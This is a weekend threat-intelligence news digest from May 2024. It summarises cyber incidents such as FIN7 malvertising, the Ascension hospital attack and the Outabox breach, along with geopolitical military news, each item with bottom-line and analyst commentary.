Daily Drop (785)Weekend Round Up
05-12-24
Sunday, May 12 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding the Proof Of Concepts (PoC) if available for mentioned CVE’s :
A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project. *
Defense Intelligence Warns of New Russian Information and Psychological Operations (IPSOs)
Bottom Line Up Front (BLUF): The Defense Intelligence of the Ministry of Defense of Ukraine has issued a warning regarding a renewed wave of Russian hostile information and psychological operations (IPSOs), aimed at undermining Ukrainian societal cohesion and manipulating public sentiment amidst intensifying front-line activities.
Analyst Comments: The alert from the Ukrainian Defense Intelligence is a sobering reminder of the non-physical fronts in the ongoing conflict between Ukraine and Russia. These operations not only aim to mislead and create discord among civilians but also target the unity and resilience of Ukrainian society against the backdrop of military aggression. This method of warfare seeks to exploit societal vulnerabilities and manipulate public perception, complicating the already challenging situation on the ground.
FROM THE MEDIA: The Defense Intelligence's statement indicates an increase in Russian efforts to divide Ukrainian society through politically charged information campaigns. These campaigns are often laced with provocations and exploit real societal issues, distorting them to serve the aggressor's objectives. The intelligence body also noted that Russian operations have broadened their targets beyond military installations to include civilian infrastructure and populations, thereby exacerbating the humanitarian situation. Ukrainian specialists in information operations are actively countering these threats, striving to bolster national solidarity and resilience amidst these challenges.
READ THE STORY: Ukranews
State-Sponsored Cyberattacks Target B.C. Government Systems: Sophisticated Attempts to Breach Digital Infrastructure Raise Concerns
Bottom Line Up Front (BLUF): The B.C. government is facing a series of sophisticated cyberattacks believed to be orchestrated by a state or state-sponsored actor. Three separate attempts to breach government systems have been made over the last month, but no sensitive information appears to have been compromised, and there has been no interruption to government operations or services. Officials are working closely with federal agencies and private sector partners to investigate the incident and determine the appropriate response.
Analyst Comments: The sustained and sophisticated nature of the cyberattacks on B.C. government systems underscores the growing threat of nation-state cyber espionage and sabotage. The attackers' ability to cover their tracks and evade detection suggests a well-resourced and persistent adversary, likely motivated by geopolitical objectives. The government's proactive investments in cybersecurity infrastructure and close collaboration with federal partners, such as the Canadian Centre for Cyber Security (CCCS), have been crucial in detecting and mitigating the impact of these attacks. The incident highlights the importance of a coordinated, multi-stakeholder approach to cybersecurity in the face of complex and evolving threats.
FROM THE MEDIA: The cyberattacks were first detected on April 10, with additional attempts identified on April 29 and May 6. The CCCS and Microsoft's Detection and Response Team (DART) were notified early in the process, and public service workers were instructed to change their passwords in response to the threat actor's activities. Premier David Eby publicly announced the attacks on May 8, after the CCCS confirmed that appropriate safeguards were in place. Investigations into the incidents are ongoing, with over 40 terabytes of data being analyzed. While the specific nation behind the attacks has not been disclosed, officials believe the level of sophistication exhibited by the attackers is consistent with that of a state actor or state-sponsored actor. The motivation behind the attacks remains unknown. The B.C. government has made significant investments in cybersecurity, dedicating $50.8 million in 2022 to update cyber-security controls and maintaining a team of 76 staff with an annual budget of $25 million to protect its digital infrastructure.
FIN7 Cybercrime Group Targets Multiple Industries with Malicious Google Ads and Backdoors
Bottom Line Up Front (BLUF): The financially motivated cybercrime group FIN7 has been conducting spear-phishing campaigns targeting various industries, including the U.S. automotive sector, using malicious Google ads and trusted brand impersonation to deliver backdoors such as Carbanak, NetSupport RAT, and DiceLoader.
Analyst Comments: FIN7's evolving tactics, which now include the use of malvertising and signed MSIX files to bypass security measures, underscore the group's adaptability and the growing sophistication of their attacks. The targeting of multiple industries and the use of trusted brand impersonation highlight the need for organizations to remain vigilant and proactively defend against these threats through a combination of technical controls, user education, and threat intelligence.
FROM THE MEDIA: In late 2023 and April 2024, FIN7 targeted the U.S. automotive industry and other sectors using spear-phishing emails containing malicious links to fake websites impersonating well-known brands such as AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet. The attackers used Google ads to lure victims to these sites, where they were prompted to download malicious MSIX files disguised as browser extensions or software installers. The MSIX files contained PowerShell scripts that collected system information and retrieved additional payloads, ultimately leading to the deployment of backdoors like Carbanak, NetSupport RAT, and DiceLoader. FIN7 used signed MSIX files and legitimate-looking pop-ups to evade detection, abusing certificates from companies like "SOFTWARE SP Z O O" and "SOFTWARE BYTES LTD." The group also employed reconnaissance tools and techniques, such as exporting Active Directory data and achieving persistence through scheduled tasks.
READ THE STORY: THN // Esentire
UPDATE: China Establishes Information Support Force Amid PLA Reorganization for Modern Warfare
Bottom Line Up Front (BLUF): On April 19, 2024, the People's Liberation Army (PLA) of China officially disbanded its Strategic Support Force (SSF), which had played a pivotal role in integrating cyber, space, and electronic warfare capabilities into the PLA’s operational strategy since its inception in 2015. The dissolution led to the creation of three separate entities: the Aerospace Force (ASF), the Cyberspace Force (CSF), and the Information Support Force (ISF), now directly overseen by the Central Military Commission (CMC).
Analyst Comments: The dissolution of the SSF and the creation of specialized arms represent a strategic realignment of China's military capabilities toward a more focused and directly controlled approach. The restructuring seems aimed at enhancing operational effectiveness and reducing bureaucratic layers, potentially increasing China's ability to conduct integrated operations in the domains of cyber and space warfare. This shift may also reflect a broader intent to centralize command and increase accountability, possibly influenced by internal challenges such as corruption within the military ranks.
FROM THE MEDIA: The SSF was established in 2015, bringing together various PLA capabilities in cyber, space, and electronic warfare under one umbrella. It was responsible for significant aspects of China's military modernization and informatization efforts. However, the recent restructuring has divided the SSF into the ASF, CSF, and ISF, with each new force focusing on a specific domain of warfare. This reorganization allows for more specialized development within each domain and places critical strategic capabilities directly under the CMC's control, which could streamline decision-making and operational deployment. The formation of these new forces occurs in the context of Xi Jinping's broader military reforms, which emphasize the importance of modernizing and centralizing control over the PLA to better align with China's growing international ambitions and security concerns.
READ THE STORY: Times of India // EV // Jamestown
Ascension Hospitals Hit by Cyberattack: What Happens Next?
Bottom Line Up Front (BLUF): Ascension, one of the largest U.S. health systems, fell victim to a cybersecurity incident on Wednesday, forcing hospitals nationwide to divert emergency medical services. The health system has engaged cybersecurity firm Mandiant to assist in the investigation and remediation efforts, while some nonemergency services have been paused and patients are advised to bring written notes on symptoms and medications to their appointments.
Analyst Comments: The cyberattack on Ascension hospitals highlights the growing threat faced by the healthcare industry. Hospitals are attractive targets for ransomware groups due to their financial pressures, increased digital health offerings, and the urgent need to maintain patient care. The immediate aftermath of such an attack is complex, involving competing interests from insurance companies, law enforcement agencies, and third-party investigators. Health systems must focus on continuing care while communicating with patients to mitigate potential legal repercussions. The incident underscores the importance of investing in robust cybersecurity measures, including automated network monitoring, strict personal device usage policies, and increased federal funding to protect against cyber threats.
FROM THE MEDIA: Ascension, which encompasses 140 hospitals across 19 states, was forced to divert emergency medical services after the cybersecurity incident on Wednesday night. The health system has engaged Mandiant, a subsidiary of Google, to assist in the investigation and remediation efforts. Multiple systems, including MyChart and certain phone lines, remain down as of Thursday evening, with no timeline for completion. In the immediate aftermath, the hospital's insurance company will investigate to ensure proper prevention measures were in place, while law enforcement agencies like the FBI may get involved. Third-party firms like Mandiant are often called in to identify the breach points and stolen information. Hospitals are attractive targets for ransomware groups due to their financial pressures, increased digital health offerings, and the urgent need to maintain patient care. Delays in care can have fatal consequences, making health systems more likely to pay hefty ransoms.
READ THE STORY: Newsweek
Japan-AUKUS Defense Technology Ties Have Great Potential But May Take Time to Develop
Bottom Line Up Front (BLUF): A recent announcement suggested possible defense technology cooperation between Japan and AUKUS (Australia, UK, US partnership) has significant potential to boost deterrence against China. However, experts believe it may take time to materialize as Japan already has bilateral projects with AUKUS members.
Analyst Comments: The potential Japan-AUKUS collaboration on advanced capabilities like cyber defense, AI, quantum tech, and undersea operations could provide mutual advantages by leveraging Japanese industries' strengths. Japan's focus on developing similar defense technologies aligns with AUKUS goals. However, Japan's participation is likely still in early stages, and information security is seen as a potential hurdle for Japan to overcome before joining highly sensitive AUKUS efforts. To maximize the partnership's potential, Japan and AUKUS will need to identify tech areas where collaboration can compensate for individual weaknesses, but an AUKUS-Japan alliance is considered a long-term prospect that will take time to bear fruit.
FROM THE MEDIA: AUKUS ministers said in April they are "considering cooperation with Japan" on advanced capabilities like cyber defense, AI, quantum tech, and undersea operations (AUKUS Pillar II). This could add to the "deterrent effect" against China's assertiveness and provide mutual advantages by leveraging Japanese industries' strengths in robotics, precision devices etc. Japan's focus on developing similar defense technologies, as outlined in its updated National Security Strategy, provides a basis for beneficial collaboration. Japan already has smooth bilateral defense projects with the U.S., UK and Australia individually, so there seems little incentive to urgently promote quadrilateral projects. Information security is seen as a potential hurdle for Japan to overcome before joining highly sensitive AUKUS efforts. Japan needs to enhance protection of confidential data.
READ THE STORY: Japan Today
Starlink Warns of Potential Service Disruptions Due to Severe Geomagnetic Storm
Bottom Line Up Front (BLUF): Starlink, Elon Musk's satellite internet company, has cautioned that its services may experience disruptions due to the most significant geomagnetic storm in two decades, caused by heightened solar activity. With Starlink owning approximately 60% of the roughly 7,500 satellites currently orbiting Earth, the company holds a dominant position in the satellite internet sector.
Analyst Comments: The ongoing geomagnetic storm, characterized by the US National Oceanic and Atmospheric Administration (NOAA) as the most severe since October 2003, poses significant challenges to Starlink's vast network of satellites in low Earth orbit. The company's innovative approach, which relies on laser links between satellites for seamless data transmission, is vulnerable to the disruptive effects of space weather phenomena. This incident underscores the inherent risks associated with satellite-based technologies and highlights the need for robust contingency plans to mitigate the impact of such events on critical infrastructure and services.
FROM THE MEDIA: Starlink issued a cautionary statement on Saturday regarding a potential "service disruption" stemming from Earth's exposure to the most substantial geomagnetic storm in two decades, prompted by heightened solar activity. Elon Musk communicated via the "X" platform about the significant strain experienced by Starlink's satellites amidst the geomagnetic solar storm, noting that the satellites have managed to withstand the pressure thus far. The NOAA has forecasted that the storm, the most significant of its kind since October 2003, will persist through the current day and tomorrow, posing potential risks to various services, including navigation systems, electricity networks, and satellite communication. Starlink's vast network of thousands of satellites in low Earth orbit relies on laser links between satellites to facilitate seamless data transmission at the speed of light, enabling the company to deliver internet coverage across the globe, catering to remote and underserved regions.
READ THE STORY: CNBC // MSN // MENAFN
Ukrainian Intelligence Strikes Three Industrial Facilities Inside Russia
Bottom Line Up Front (BLUF): The Main Intelligence Directorate of the Ministry of Defense of Ukraine conducted attacks on three crucial industrial facilities within Russian territory overnight on May 12, according to sources from RBC-Ukraine. The targeted facilities included the Volgograd oil refinery, the Kaluganefteprodukt oil depot in Lyudinovo, and the Novolipetsk Metallurgical Plant.
Analyst Comments: These strategic strikes by Ukrainian intelligence on key Russian industrial assets underscore the expanding scope and boldness of Ukraine's military operations, aimed at disrupting Russia's war efforts and economic infrastructure. The targeting of the Novolipetsk Metallurgical Plant, which has been linked to the production of materials for Russia's nuclear weapons and ballistic missile programs, suggests a deliberate effort to undermine Moscow's military-industrial complex. The repeated nature of these attacks also highlights the vulnerability of Russia's critical infrastructure and the effectiveness of Ukraine's intelligence-gathering and strike capabilities.
FROM THE MEDIA: The Novolipetsk Metallurgical Plant, one of Russia's largest similar facilities, has been targeted by Ukrainian drones at least twice before, in February and April 2024. The plant is reported to have produced raw materials for Russian companies involved in nuclear weapons and ballistic missiles. Residents of the Volgograd region reported explosions overnight in the Chervonoyarmiysky district, which occurred at a local oil refinery and led to a fire. Online reports suggest that drones were used in the attack on the refinery. Sources from RBC-Ukraine also report that the Volgograd oil refinery, owned by Lukoil, was targeted by drones from the Main Intelligence Directorate. The primary oil processing units AVT-1 and AVT-6 were damaged, as well as the control cable for air coolers and the smokestack of furnace P-1.
READ THE STORY: Yahoo News(AU) // RBC-Ukraine
Massive Data Breach Exposes Personal Information of Over 1 Million Australians from Facial Recognition System
Bottom Line Up Front (BLUF): A major data breach linked to Outabox, an Australian facial recognition system used in bars and clubs, has compromised sensitive personal information of over 1 million individuals. The incident highlights growing privacy concerns as AI-based facial recognition becomes more widespread in public spaces.
Analyst Comments: This massive data breach underscores the severe consequences that can arise from collecting sensitive biometric data and implementing facial recognition systems without robust data protection. As these technologies proliferate in public spaces, the incident is a wake-up call about the urgent need for stronger privacy regulations, security measures, and public awareness. Companies must prioritize data security, carefully vet their IT providers, and limit unnecessary data collection and sharing. Governments should heed expert warnings and enact bold reforms to protect citizens' biometric privacy rights before irreversible damage is done.
FROM THE MEDIA: A website called "Have I Been Outaboxed" claims to have over 1 million records from an unsecured Outabox database, allegedly created by former developers in the Philippines who were not paid. The site allows visitors to check if their data was included. The exposed data allegedly includes biometric facial recognition, driver's license scans, signatures, club membership details, addresses, birthdates, phone numbers, club visit timestamps, and slot machine usage. Outabox deployed facial recognition kiosks in venues to scan visitors and check temperatures during the Covid-19 pandemic. The kiosks could also identify problem gamblers who self-excluded. Australian police are investigating the breach and have arrested a 46-year-old Sydney man expected to be charged with blackmail. Federal agencies are also involved. ClubsNSW, the peak body for licensed clubs in New South Wales, has notified members that 16 clubs using the compromised IT provider may have had patron data exposed. Some clubs have posted privacy breach notices.
READ THE STORY: The Register // Wired // Tecb Times
Sopra Steria, the parent company of the hacked MoD supplier, holds significant government contracts across various departments
Bottom Line Up Front (BLUF): Sopra Steria, through its subsidiary SSCL, which was recently targeted in a cyberattack suspected to be conducted by Chinese operatives, has extensive contracts totaling £1.6 billion across various UK government sectors including the NHS, MoD, and National Savings & Investments.
Analyst Comments: The cyberattack on SSCL underscores a significant security breach that could have broader implications for UK national security, given the range of sensitive roles the company holds across government departments. This incident highlights potential vulnerabilities in the supply chain security of critical government infrastructure, which could be exploited to access a wide array of sensitive information. The fact that SSCL handles payroll data for the MoD raises concerns about the exposure of personal information of military personnel, which could be leveraged in espionage operations.
FROM THE MEDIA: opra Steria's subsidiary, SSCL, was reported to be the target of the cyberattack, with hackers gaining unauthorized access to the payroll records of 270,000 military personnel, potentially compromising their personal information. The UK's Defense Secretary, Grant Shapps, confirmed the breach and apologized for the incident, which he declared "should not have happened." This breach highlights the increasing threats of state-sponsored cyberattacks and the need for enhanced cybersecurity measures within government contractors handling sensitive data. SSCL’s broad portfolio with the government, managing contracts worth millions, underscores the extent of potential data that could be at risk.
READ THE STORY: Express
The Escalating Militarization of Chinese Society
Bottom Line Up Front (BLUF): China has introduced a new law mandating military training for middle school students and reinforcing national defense education, marking a significant step in the militarization of Chinese society—a trend reminiscent of the Mao Zedong era. Additionally, Chinese companies, including major state-owned enterprises, are establishing militia units, indicating a deepening integration of military preparedness into civilian sectors.
Analyst Comments: The introduction of mandatory military training for children as young as 12 indicates a strategic pivot towards ingraining military discipline and patriotism from an early age. This policy could be driven by multiple factors including a perceived need to bolster military recruitment and instill a robust nationalist ethos among the youth. This move also mirrors broader global trends where nations are intensifying their defense mechanisms in educational curriculums amidst growing geopolitical tensions.
FROM THE MEDIA: China's revised 'law on national defense education' mandates military drills and defense studies starting in middle school, intensifying the militaristic grooming of the youth. This push extends into the corporate sector, with firms like the Industrial and Commercial Bank of China forming militias equipped with uniforms and weapons. These moves are part of a broader national strategy to secure and fortify the nation against both external and internal threats, reflecting President Xi Jinping’s heightened focus on national security across all sectors of Chinese society.
READ THE STORY: The Spectator
Items of interest
PLAN Warships Navigate Japanese Waters Amid Tri-Nation Information Warfare Agreement
Bottom Line Up Front (BLUF): A pair of Chinese frigates and an intelligence ship recently navigated waters around Japan's southwest islands and through the Miyako Strait, escalating regional tensions. Concurrently, Japan, the United States, and Australia have strengthened their collaboration on information warfare, highlighting the strategic importance of intelligence and non-kinetic operations in the Indo-Pacific region's complex security environment.
Analyst Comments: The navigation of People's Liberation Army Navy (PLAN) warships around key Japanese islands, particularly near disputed territories such as the Senkaku Islands, serves multiple strategic purposes for China. It demonstrates China's naval capability and asserts its claims over contested areas. The timing of these movements with the tri-nation information warfare memorandum suggests a multifaceted approach to regional dominance, combining physical naval presence with enhanced capabilities in cyber and space domains. This development indicates a heightened state of strategic competition in the region, where information warfare capabilities are becoming as crucial as traditional military power.
FROM THE MEDIA: On May 10, 2024, Japanese defense forces tracked two PLAN frigates, CNS Changzhou and CNS Luan, as they maneuvered through international but sensitive waters near Japan's southwest islands, a route frequently used by the PLAN to access the Pacific Ocean. This operation coincides with the sighting of the Dongdiao-class surveillance ship Dubhe in the Miyako Strait, a key strategic channel between Miyako Island and Okinawa. These movements are part of a broader pattern of Chinese naval activity around Japanese waters, often perceived as efforts to test Japan's response and resolve in the face of Chinese military activities.
READ THE STORY: USNI
Documentary: 'Generation Blue Water' (Video) *CGTN*
FROM THE MEDIA: "Generation Blue Water" is a groundbreaking CGTN documentary that explores one of the world's rising naval powers — the People's Liberation Army Navy. The film takes viewers aboard China's two operational aircraft carriers, the Liaoning and Shandong, as well as its most advanced destroyer, the Type 055, to see the intensive training for blue water operations.
The Chinese Navy: Copy and Pasted (Video)
FROM THE MEDIA: China's PLA Navy has its own unique set of objectives, strategy and force composition than the other two major naval powers, the US and Russia.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.